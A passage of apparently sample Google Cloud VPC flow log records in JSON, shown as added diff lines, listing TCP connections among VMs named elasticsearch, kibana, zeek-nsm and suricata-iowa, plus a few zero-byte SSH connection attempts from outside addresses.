t","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.168.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"67.43.156.13","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetw
ork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"67.43.156.13","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"67.43.156.13","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwo
rk_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"67.43.156.13","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"67.43.156.14","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-pro
ject","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"67.43.156.13","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"
758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"67.43.156.13","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
